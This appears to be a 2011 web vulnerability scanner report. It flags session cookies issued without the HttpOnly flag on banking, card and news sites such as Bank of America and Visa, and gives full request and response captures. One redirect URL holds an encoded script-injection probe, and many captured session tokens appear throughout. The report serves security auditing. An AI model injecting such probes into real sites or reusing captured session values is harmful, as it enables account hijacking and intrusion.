HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:24 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:39 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=32 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 199594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Pages/English/In_Activation.asp HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; ASPSESSIONIDAGCQRSRC=BFDJILIABKKFNCJMKPJHEKFE; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33016 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDCEBTTQTD=CBKHKLIACNGDOFLANKMCMJAE; secure; path=/ Date: Wed, 02 Feb 2011 22:45:28 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Pages/English/In_Activation.asp HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33016 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=FADJILIALPKBMLEBFOALEPLO; secure; path=/ Date: Wed, 02 Feb 2011 21:59:51 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Pages/English/In_Activation.asp HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; ASPSESSIONIDAGCQRSRC=BFDJILIABKKFNCJMKPJHEKFE; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33016 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDCURDRQSB=OFLPJLIAOCPGBDIFMIHMIECE; secure; path=/ Date: Thu, 03 Feb 2011 01:05:05 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /inetSearch/index.jsp HTTP/1.1 Host: query.jpmorgan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:02:18 GMT Server: Apache Cache-Control: no-cache="set-cookie" Set-Cookie: JSESSIONID=KFKmNJJKBh8w3T235vB2R8Qz32jnddvvJrrlLsGRnnK7nB5DNzGx!1437584885; path=/ X-Powered-By: Servlet/2.4 JSP/2.0 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 18669
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /selfservice/microsites/wachoviaSearchEntry.do HTTP/1.1 Host: search.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=686F25B2A610A0A70D54FF608686FDBA; Path=/selfservice Content-Type: text/html;charset=UTF-8 Date: Wed, 02 Feb 2011 22:02:24 GMT Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=2p89gp55i3nje29ques3sj6a45; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ip-board/ HTTP/1.1 Host: search.wareseeker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:24:27 GMT Server: Apache Set-Cookie: PHPSESSID=2p89gp55i3nje29ques3sj6a45; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56061
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ccc01/comment_card.asp HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 6067 Content-Type: text/html; Charset=UTF-8 Set-Cookie: ASPSESSIONIDCQATDDAR=FGIHILFAKFPCACOOHKFEFHBP; path=/ Date: Wed, 02 Feb 2011 22:02:31 GMT Connection: close
<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-16"> <base href="https://secure.opinionlab.com/ccc01"> <title>Comment Ca ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rate36s.asp? HTTP/1.1 Host: secure.opinionlab.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19 Content-Type: text/html Set-Cookie: ASPSESSIONIDCQATDDAR=NGIHILFABKDPKDCHAENGBKCJ; path=/ Date: Wed, 02 Feb 2011 22:02:33 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/resetIDScreen.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=244C13942F18102F3BD996FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000s0eMf9y2EnRfOFlN2C8I1eP:13k5uohoo; Path=/ Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/resetPasscodeScreen.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=2452CCDE2F18102F3BDB96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000kF4ME17cVzwHT7rf0vMZses:13k5uolvs; Path=/ Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sas/signon.do HTTP/1.1 Host: sitekey.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:02:35 GMT Content-type: text/html Set-Cookie: TLTSID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com Set-Cookie: TLTUID=2465625E2F18102F3BDD96FBE0492B85; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:02:35 GMT Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-control: no-cache="set-cookie,set-cookie2" P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Location: http://www.bankofamerica.com/state.cgi?section=gslsignin&update=yes Content-language: en-US Set-cookie: GSLSESSIONID=0000xqKx0Pm6KLlxeiVVja8EmdE:13k5uoqt5; Path=/ Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: smallbusinessonlinecommunity.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookies were issued by the application and do not have the HttpOnly flag set:
TestSess3=30041296684284122624552;path=/
CoreID6=30041296684284122624552; path=/; expires=Sun, 01 Feb 2026 22:04:44 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 302 Found Date: Wed, 02 Feb 2011 22:04:44 GMT Server: Apache P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA" Set-Cookie: CoreID6=30041296684284122624552; path=/; expires=Sun, 01 Feb 2026 22:04:44 GMT Set-Cookie: TestSess3=30041296684284122624552;path=/ Location: http://data.coremetrics.com/cm?tid=1&ci=90010394&vn2=e4.0&st=1296684336309&vn1=4.2.7.1BOA&ec=utf-8&pi=AboutBAC%3AHelp%3APageNotFound%3BCF-HTTP-PageNotFound&cg=AboutBAC%3AHelp%3APageNotFound&rnd=1296688180794&ul=http%3A//www.bankofamerica.com/findit/error.cgi&pv11=%7C000302027g850000c336%7C&rf=http%3A//www.bankofamerica.com/vehicle_and_personal_loans544ce%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E45ae18a6011/index.cfm&cvdone=p&cmig=y Content-Type: text/plain; charset=UTF-8 Content-Length: 0
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Thu, 03 Feb 2011 01:04:58 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Location: pbl.asp Content-Length: 128 Content-Type: text/html Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=BDCPFOICCKLENOGJKIBLOLMG; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: support01.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:00 GMT Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.3 X-Powered-By: PHP/5.2.3 Set-Cookie: PHPSESSID=2eba1bedd93d630fa422ccbd7765c32e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache Pragma: no-cache Content-Length: 1713 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=k2q7s7bd7dtdm25nb0rni4rg00; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more HTTP/1.1 Host: thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Thu, 03 Feb 2011 01:19:58 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Set-Cookie: PHPSESSID=k2q7s7bd7dtdm25nb0rni4rg00; path=/ Connection: close Content-Length: 73954
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]...
guest_id=129668416138493212; path=/; expires=Fri, 04 Mar 2011 22:02:41 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /PracticalMoney HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 02 Feb 2011 22:02:41 GMT Server: hi Status: 200 OK X-Transaction: 1296684161-47748-46212 ETag: "123020b57eac8841ca216e71073e2ac7" Last-Modified: Wed, 02 Feb 2011 22:02:41 GMT X-Runtime: 0.01070 Content-Type: text/html; charset=utf-8 Content-Length: 50296 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296684161371599; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com Set-Cookie: guest_id=129668416138493212; path=/; expires=Fri, 04 Mar 2011 22:02:41 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCGkZZugtAToHaWQiJTZkMDhhYzVkZmFmMDBh%250AZGI1Y2ZlNjUwMTRjM2U4NmRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--ec51ce26345a482a3890029a850bf2fabb529608; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129668416203448535; path=/; expires=Fri, 04 Mar 2011 22:02:42 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /navyfederalnews HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 02 Feb 2011 22:02:42 GMT Server: hi Status: 200 OK X-Transaction: 1296684162-28021-53593 ETag: "f8784a8a1866b0cf5f586d1676f574b8" Last-Modified: Wed, 02 Feb 2011 22:02:42 GMT X-Runtime: 0.01594 Content-Type: text/html; charset=utf-8 Content-Length: 55640 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296684161892555; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com Set-Cookie: guest_id=129668416203448535; path=/; expires=Fri, 04 Mar 2011 22:02:42 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPYbZugtAToHaWQiJTk2YjVjMzRiODFjOGZk%250AYjYyMDYzN2RiNmZkOGJmZTQ4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--7afe7bcaae311831c57885dd7cd5733609b08898; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cardadvisor/CardAdvisor HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal/account-inquiries/card_providers.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal/discounts/index.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal/security/identity_theft_search.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal/student/index.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal/visa_brings_you/mytaxrefund.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /specialOffers/AOLVisaOffers/offers.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /specialOffers/CMS/offers.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /specialOffers/Yahoo/offers.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /signaturesouthwest/index.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.3.9.1296683997731; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /specialOffers/FUSA_Amazon/offers.jsp HTTP/1.1 Host: usa.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: visa.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: visa.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /usa_atm/ HTTP/1.1 Host: visa.via.infonow.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
